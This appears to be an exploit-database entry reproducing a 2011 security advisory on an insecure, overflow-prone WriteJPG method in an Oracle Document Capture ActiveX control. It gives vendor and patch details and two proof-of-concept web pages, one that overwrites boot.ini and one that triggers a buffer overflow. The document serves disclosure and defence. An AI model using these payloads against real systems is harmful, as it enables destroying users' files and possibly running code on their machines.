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Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect integrity and availability via unknown vectors related to Import Server. NOTE: the previous information was obtained from the January 2011 CPU. Oracle has not commented on claims from the original researcher that remote attackers can overwrite arbitrary files and execute arbitrary code via a full pathname in the first argument to the WriteJPG method in the NCSECWLib ActiveX control.
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Publication date : 2011-01-25 23h00 +00:00 Author : Alexandr Polyakov EDB Verified : No
Source: http://packetstormsecurity.org/files/view/97871/DSECRG-11-006.txt
ActiveX components contain insecure methods.
Digital Security Research Group [DSecRG] Advisory DSECRG-11-006 (internal #DSECRG-09-066)
Application: Oracle Document Capture
Versions Affected: Oracle Document Capture 10.1.3.5
Vendor URL: http://oracle.com
Bugs: Insecure method. Buffer overflow.
Exploits: YES
Reported: 14.12.2009
Vendor response: 15.12.2009
Date of Public Advisory: 24.01.2011
CVE: CVE-2010-3599
Author: Alexandr Polyakov from DSecRG
Description
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Insecure method was founded in NCSECWLib ActiveX control component which is a part of Oracle Document Capture .
One of the methods (WriteJPG) can be used to overwrite files on users system and also affected to buffer overflow.
Details
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Attacker can construct html page which call vulnerable function "WriteJPG" from ActiveX Object NCSECWLib.
Example 1 (file overwrite)
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<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid = "NCSECWLib.NCSRenderer"
argCount = 3
arg1="c:\boot.ini"
arg2=1
arg3=True
target.WriteJPG arg1 ,arg2 ,arg3
</script>
</html>
Example 2
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<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid = "NCSECWLib.NCSRenderer"
argCount = 3
arg1=String(13332, "A")
arg2=1
arg3=True
target.WriteJPG arg1 ,arg2 ,arg3
</script></job></package>
References
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http://dsecrg.com/pages/vul/show.php?id=306
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
Fix Information
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Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
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